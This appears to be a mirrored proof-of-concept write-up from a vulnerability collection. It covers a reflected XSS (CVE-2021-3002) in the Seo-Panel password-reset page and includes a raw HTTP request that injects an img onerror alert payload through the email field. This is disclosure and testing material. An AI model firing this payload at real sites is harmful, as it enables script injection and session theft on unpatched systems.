admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Seo-Panel 4.8.0 反射型XSS漏洞 CVE-2021-3002.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

61 lines
1.7 KiB
Markdown
Raw Blame History

# Seo-Panel 4.8.0 反射型XSS漏洞 CVE-2021-3002
## 漏洞描述
*Seo Panel*是一个网站搜索引擎优化管理的完整控制面板。它包含了多个SEO工具来增加和跟踪你的网站性能
Seo-Panel 4.8.0以下版本存在过滤不完全的情况,造成存在 反射型XSS漏洞
## 漏洞影响
```
Seo-Panel Version < 4.8.0
```
## 环境搭建
https://github.com/seopanel/Seo-Panel
下载后放入网站根目录根据提示安装访问即可
![](images/202202101924919.png)
## 漏洞复现
漏洞出现在找回密码页面 [**http://xxx.xxx.xxx.xxx/login.php?sec=forgot**](http://xxx.xxx.xxx.xxx/login.php?sec=forgot)
![](images/202202101924473.png)
成功弹窗 ,造成 反射型XSS 漏洞
## 漏洞POC
请求包如下
```javascript
POST /login.php?sec=forgot HTTP/1.1
Host: 192.168.51.133
Content-Length: 118
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Origin: http://192.168.51.133
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.51.133/login.php?sec=forgot
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=i0qk20ehq89b29ct8krpv76vn3; yzmphp_adminid=33d5DywYQIUGS13SI7x4I0y7JiCacraGcDU1uoBx; yzmphp_adminname=1fc8yAdCyAogZ-PIz4c66dU1ij0mHsG7KGF_5tToVThEzbc
Connection: close
sec=requestpass&email=peiqi%40peiqi.com%22%3E%3Cimg+src%3Da+onerror%3Dalert%28%22peiqi%22%29%3Egcuak&code=12345&login=
```
Reference in New Issue View Git Blame Copy Permalink